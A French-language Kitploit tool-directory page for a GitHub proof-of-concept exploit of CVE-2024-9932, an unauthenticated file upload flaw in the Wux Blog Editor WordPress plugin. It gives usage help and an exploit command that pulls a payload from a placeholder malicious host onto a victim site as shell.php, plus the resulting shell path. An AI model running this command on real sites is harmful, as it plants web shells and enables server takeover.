Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9932-POC — Exploit de preuve de concept pour CVE-2024-9932, une vulnérabilité non authentifiée de téléchargement arbitraire de fichiers dans le plugin WordPress Wux Blog Editor, permettant l'exécution de code à distance via un téléchargement de fichier malveillant. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-9932-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

Exploit de preuve de concept pour CVE-2024-9932, une vulnérabilité non authentifiée de téléchargement arbitraire de fichiers dans le plugin WordPress Wux Blog Editor, permettant l'exécution de code à distance via un téléchargement de fichier malveillant.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9932-POC

Description:

Le plugin Wux Blog Editor pour WordPress est vulnérable à des téléchargements de fichiers arbitraires en raison d'une validation insuffisante du type de fichier dans la fonction wuxbt_insertImageNew. Les versions jusqu'à 3.0.0 inclus sont concernées. Cette vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur, pouvant potentiellement conduire à une exécution de code à distance (RCE).

Détails de la vulnérabilité

La vulnérabilité provient d'une validation incorrecte du type de fichier dans la fonction wuxbt_insertImageNew. Cela permet à des attaquants de télécharger des fichiers malveillants sur le serveur sans authentification.

Scénario d'attaque :

root@kitploit:~
L'attaquant identifie un site web utilisant le plugin vulnérable.
Exploite la fonctionnalité de téléchargement de fichiers pour télécharger un shell PHP malveillant.
Exécute des commandes sur le serveur compromis.

Utilisation

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

Commande d'exploitation

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

Résultats

Exemple de téléchargement réussi

1- Fichier trouvé :

2- Résultat de l'exécution : Accédez à l'URL du fichier pour exécuter la charge utile.

root@kitploit:~
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

Avertissement

Cet outil est uniquement à des fins éducatives. L'utilisation non autorisée de ce script sur des systèmes sans permission est illégale.

Télécharger l’outil